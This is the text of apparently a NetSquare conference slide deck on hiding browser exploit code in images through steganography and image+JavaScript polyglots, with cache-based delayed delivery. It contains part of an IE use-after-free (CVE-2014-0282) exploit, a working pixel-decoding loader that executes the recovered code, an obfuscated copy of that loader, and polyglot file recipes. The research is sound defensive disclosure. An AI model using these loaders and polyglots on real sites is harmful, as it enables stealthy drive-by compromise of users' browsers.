+='u4242'}for(var a=0;a<c.length;a++){c[a].title=b}}}function run() {spray();document.getElementById('c2').checked=true;document.getElementById('c2').onpropertychange=changer;flag= true;document.getElementById('fm').reset()}setTimeout(run,1000); IE Use-After-Free CVE-2014-0282
  • 12. NETSQUARE 1 pixel = 8 bits (grayscale) The "Bit Layer" View 7  6 5 4 3 2 1 0 | | MSB LSB
  • 13. NETSQUARE more shape less detail 7 6 5 4 3 2 1 0 less shape more detail The "Bit Layer" View
  • 15. NETSQUARE 7 6 5 4 3 2 1 0
  • 16. NETSQUARE Exploit code converted to bitstream. Pixel bits of layer 7 are overwritten with exploit bitstream. Encoding at Bit Layer 7 7 6 5 4 3 2 1 0 | | MSB LSB
  • 17. Encoding data at bit layer 7 Significant visual aberration
  • 18. NETSQUARE Exploit code converted to bitstream. Pixel bits of layer 2 are overwritten with exploit bitstream. Encoding at Bit Layer 2 7 6 5 4 3 2 1 0 | | MSB LSB
  • 19. Encoding data at bit layer 2 No perceptible visual aberration
  • 20. NETSQUARE Encoding on JPG vs PNG •  JPG = lossy compression •  Pixels approximated to nearest neighbours •  Multi-pass encoding •  Min. layer = 2 or 3 •  Browser specific JPEG encoders •  PNG = lossless compression •  Negligible visual distortion in the image •  Single pass encoding •  Min. layer = 0 •  Independent of browser's PNG encoder
  • 21. NETSQUARE Step 2. Decoding the encoded Pixel Data ? STEGO- DECODER JAVASCRIPT ENCODED IMAGE
  • 22. NETSQUARE HTML5 CANVAS to the rescue! •  In-browser decoding of steganographically encoded images. •  Read image pixel data using JS. •  Rebuild JS exploit code from pixel data, in memory. •  Simple array and bit manipulation operations.
  • 23. NETSQUARE decode_pixels.js L=2,C=3,G=3,a=[],x=y=0,z=1<<L,I=parseInt,S=String.fromCharCode;window.onload= function(){P.onclick=function({V=document.createElement("canvas");k=P.parentNode; k.insertBefore(V,P);W=V.width=P.width;H=V.height=P.height;m=V.getContext("2d"); m.drawImage(P,0,0);k.removeChild(P);m=m.getImageData(0,0,W,H).data;c=function(p,x,y) {n=(y*W+x)*4;r=(p[n]&z)>>L;g=(p[n+1]&z)>>L;b=(p[n+2]&z)>>L;return S([r,g,b,r][C]+48)}; k=function(l){for(i=j=0;j<l*8;j++){a[i++]=c(m,x,y);x+=G;if(x>=W){x=0;y+=G}}};k(6); k(I(X(a)));try{CollectGarbage()}catch(e){}setTimeout(new Function(X(a)),99)}};function X(c){s="",d=c.join(s);for(i=0;i<d.length;i+=8)s+=S(I(d.substr(i,8),2));return s} $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$) +"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+""+$.__$+$.__$+$.$__+"="+$._$_+","+$.__$+$.___+$._$$+"="+$._$$+","+ $.__$+$.___+$.$$$+"="+$._$$+","+$.$_$_+"=[],"+$.__$+$.$$$+$.___+"="+$.__$+$.$$$+$.__$+"="+$.___+","+$.__$+$.$$$+$._$_+"="+$.__$+"<<"+$.__$+$.__$+$.$__+","+$.__$+$.__$+$.__$+"="+$.__$+$.$$_+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+""+ $.__$+$.$$_+$._$$+$.$$$_+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$$_+$.__+","+$.__$+$._$_+$._$$+"="+$.__$+$._$_+$._$$+$.__+""+$.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$+"."+$.$$$$+""+$.__$+ $.$$_+$._$_+$._$+""+$.__$+$.$_$+$.$_$+""+$.__$+$.___+$._$$+""+$.__$+$.$_$+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+""+$.__$+$.___+$._$$+$._$+$.$$_$+$.$$$_+";"+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+$.$$_$+$._$+" "+$.__$+$.$$_+$.$$$+"."+$._$+""+$.__$+$.$_$+$.$$_+(![]+"")[$._$_]+$._$+$.$_$_+$.$$_$+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"(){"+$.__$+$._$_+$.___+"."+$._$+""+$.__$+$.$_$+$.$$_ +$.$$__+(![]+"")[$._$_]+""+$.__$+$.$_$+$.__$+$.$$__+""+$.__$+$.$_$+$._$$+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"(){"+$.__$+$._$_+$.$$_+"="+$.$$_$+$._$+$.$$__+$._+""+$.__$+$. $_$+$.$_$+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+"."+$.$$__+""+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+""+$.__$+$.___+$.$_$+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$_$+$.$_$+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+"(""+$.$$__+$.$_$_+""+$.__$+$. $_$+$.$$_+""+$.__$+$.$$_+$.$$_+$.$_$_+""+$.__$+$.$$_+$._$$+"");"+$.__$+$.$_$+$._$$+"="+$.__$+$._$_+$.___+"."+$.__$+$.$$_+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+""+$.__$+$.__$+$.$$_+$._$+$.$$_$+$.$$ $_+";"+$.__$+$.$_$+$._$$+"."+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$$_+$._$$+$.$$$_+""+$.__$+$.$$_+$._$_+$.__+""+$.__$+$.___+$._$_+$.$$$_+$.$$$$+$._$+""+$.__$+$.$$_+$._$_+$.$$$_+"("+$.__$+$._$_+$.$$_+","+$.__$+$._ $_+$.___+");"+$.__$+$._$_+$.$$$+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+$.$$_$+$.__+""+$.__$+$.$_$+$.___+"="+$.__$+$._$_+$.___+"."+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+$.$$_$+$.__+""+$.__$+$.$_$+ $.___+";"+$.__$+$.__$+$.___+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$_$+$.___+$.$$$_+""+$.__$+$.$_$+$.__$+""+$.__$+$.$__+$.$$$+""+$.__$+$.$_$+$.___+$.__+"="+$.__$+$._$_+$.___+"."+$.__$+$.$_$+$.___+$.$$$_+""+$.__$+$.$_$+$.__$+""+ $.__$+$.$__+$.$$$+""+$.__$+$.$_$+$.___+$.__+";"+$.__$+$.$_$+$.$_$+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$__+$.$$$+$.$$$_+$.__+""+$.__$+$.___+$._$$+$._$+""+$.__$+$.$_$+$.$$_+$.__+$.$$$_+""+$.__$+$.$$$+$.___+$.__+"(""+$._$_+$.$$_$+" ");"+$.__$+$.$_$+$.$_$+"."+$.$$_$+""+$.__$+$.$$_+$._$_+$.$_$_+""+$.__$+$.$$_+$.$$$+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$_$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+"("+$.__$+$._$_+$.___+","+$.___+","+$.___+");"+$.__$+$.$_$+$._$$+"."+ $.__$+$.$$_+$._$_+$.$$$_+""+$.__$+$.$_$+$.$_$+$._$+""+$.__$+$.$$_+$.$$_+$.$$$_+""+$.__$+$.___+$._$$+""+$.__$+$.$_$+$.___+""+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+$.$$_$+"("+$.__$+$._$_+$.___+");"+$.__$+$.$_$+$.$_$+"="+$.__$+$.$_$+$.$_ $+"."+$.__$+$.$__+$.$$$+$.$$$_+$.__+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$_$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+""+$.__$+$.___+$.$__+$.$_$_+$.__+$.$_$_+"("+$.___+","+$.___+","+$.__$+$._$_+$.$$$+","+$.__$+$.__$+$.___+")."+$.$$_$+ $.$_$_+$.__+$.$_$_+";"+$.$$__+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$.$$_+$.___+","+$.__$+$.$$$+$.___+","+$.__$+$.$$$+$.__$+"){"+$.__$+$.$_$+$.$$_+"=("+$.__$+$.$$ $+$.__$+"*"+$.__$+$._$_+$.$$$+"+"+$.__$+$.$$$+$.___+")*"+$.$__+";"+$.__$+$.$$_+$._$_+"=("+$.__$+$.$$_+$.___+"["+$.__$+$.$_$+$.$$_+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.__$+$.$__+$.$$$+"=("+$.__$+$.$$_+$.___+"["+ $.__$+$.$_$+$.$$_+"+"+$.__$+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.$_$$+"=("+$.__$+$.$$_+$.___+"["+$.__$+$.$_$+$.$$_+"+"+$._$_+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.__$+$.$$_+$._$_+$.$$$_+$.__+$._+""+ $.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$._$_+$._$$+"(["+$.__$+$.$$_+$._$_+","+$.__$+$.$__+$.$$$+","+$.$_$$+","+$.__$+$.$$_+$._$_+"]["+$.__$+$.___+$._$$+"]+"+$.$__+$.$___+")};"+$.__$+$.$_$+$._$$+"="+$.$$$$+ $._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+(![]+"")[$._$_]+"){"+$.$$$$+$._$+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+"="+$.__$+$.$_$+$._$_+"="+$.___+";"+$.__$+$.$_$+$._$_+"<"+(![]+"")[$._$_] +"*"+$.$___+";"+$.__$+$.$_$+$._$_+"++){"+$.$_$_+"["+$.__$+$.$_$+$.__$+"++]="+$.$$__+"("+$.__$+$.$_$+$.$_$+","+$.__$+$.$$$+$.___+","+$.__$+$.$$$+$.__$+");"+$.__$+$.$$$+$.___+"+="+$.__$+$.___+$.$$$+";"+$.__$+$.$_$+$.__$+$.$$$$+"("+ $.__$+$._$_+$.$$$+"<"+$.__$+$.$$$+$.___+"){"+$.__$+$.$$$+$.___+"="+$.___+";"+$.__$+$.$$$+$.__$+"+="+$.__$+$.___+$.$$$+"}}};"+$.__$+$.$_$+$._$$+"("+$.$$_+");"+$.__$+$.$_$+$._$$+"("+$.__$+$.__$+$.__$+"("+$.__$+$._$$+$.___+"("+$.$_$_ +")));"+$.__+""+$.__$+$.$$_+$._$_+""+$.__$+$.$$$+$.__$+"{"+$.__$+$.___+$._$$+$._$+(![]+"")[$._$_]+(![]+"")[$._$_]+$.$$$_+$.$$__+$.__+""+$.__$+$.___+$.$$$+$.$_$_+""+$.__$+$.$$_+$._$_+$.$_$$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+"()}"+$.$$__+ $.$_$_+$.__+$.$$__+""+$.__$+$.$_$+$.___+"("+$.$$$_+"){}"+$.__$+$.$$_+$._$$+$.$$$_+$.__+""+$.__$+$._$_+$.$__+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$_$+$.$$$_+$._$+$._+$.__+"("+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$.$$$+""+$. $__+$.___+""+$.__$+$.___+$.$$_+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$._$$+$.___+"("+$.$_$_+")),"+$.$__$+$.$__$+")}};"+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$. $_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$._$$+$.___+"("+$.$$__+"){"+$.__$+$.$$_+$._$$+"="","+$.$$_$+"="+$.$$__+"."+$.__$+$.$_$+$._$_+$._$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$.$$_+$._$$+");"+ $.$$$$+$._$+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+"="+$.___+";"+$.__$+$.$_$+$.__$+"<"+$.$$_$+"."+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$+$.__+""+$.__$+$.$_$+$.___+";"+$.__$+$.$_$+$.__$+"+="+$.$___+")"+ $.__$+$.$$_+$._$$+"+="+$.__$+$._$_+$._$$+"("+$.__$+$.__$+$.__$+"("+$.$$_$+"."+$.__$+$.$$_+$._$$+$._+$.$_$$+""+$.__$+$.$$_+$._$$+$.__+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+","+$.$___+"),"+$._$_+"));"+$.__$+$.$$_+$._$_+$.$$$_+ $.__+$._+""+$.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$.$$_+$._$$+"}"+""")())();
  • 24. NETSQUARE Step 3. Images that ``Auto Run`` IMAJS STEGO- DECODER JAVASCRIPT POLYGLOT ENCODED IMAGE
  • 26. NETSQUARE IMAJS - Image+JS Polyglot Image Javascript Holy Sh** Bipolar Content! <img> sees pixels <script> sees code #YourPointOfView
  • 29. NETSQUARE IMAJS-JPG Recipe SOI FF D8 APP0 length J F I F 0 versn Xres DQT SOF0 DHT FF E0 U Yres H V FF DB quantization tables DQT FF DB quantization tables FF C0 start of frame FF C4 Huffman tables
  • 30. NETSQUARE IMAJS-JPG Recipe SOI FF D8 APP0 length J F I F 0 versn Xres FF E0 U Yres H V ... more random data ... <html random random random random... and other HTML stuff goes here... random ><head random> decoder script <script type=text/undefined> ... DQT SOF0 DHT FF DB quantization tables DQT FF DB quantization tables FF C0 start of frame FF C4 Huffman tables
  • 31. NETSQUARE IMAJS-PNG Recipe Inspiration: http://daeken.com/superpacking-js-demos PNG Header 89 50 4E 47 0D 0A 1A 0A IHDR IHDRlength chunk data CRC tEXtlength _00<html random random ... CRC random><head random> decoder script and other HTML stuff goes here... <script type=text/undefined>... extra tEXt chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IEND0 CRCIEND chunk
  • 32. NETSQUARE Step 4. The Finer Points of Package Delivery
  • 34. NETSQUARE Exploit code encoded in image. EVIL GET /lolcat.png 200 OK Expires: 6 months I'M IN UR BASE Decoder script references image from cache. SAFE GET /lolcat.png Load from cache ....KILLING UR DOODZ DEC 2015 APR 2016 < PAYLOADS GO back in time
  • 40. NETSQUARE Browsers and W3C - Wake Up! BROWSERS •  Don't be afraid to "BREAK THE WEB". •  Reject content that does not conform to strict standards/specs. W3C •  STRICT parsing rules – like COMPILERS. •  Browser compliance and user- awareness is YOUR responsibility.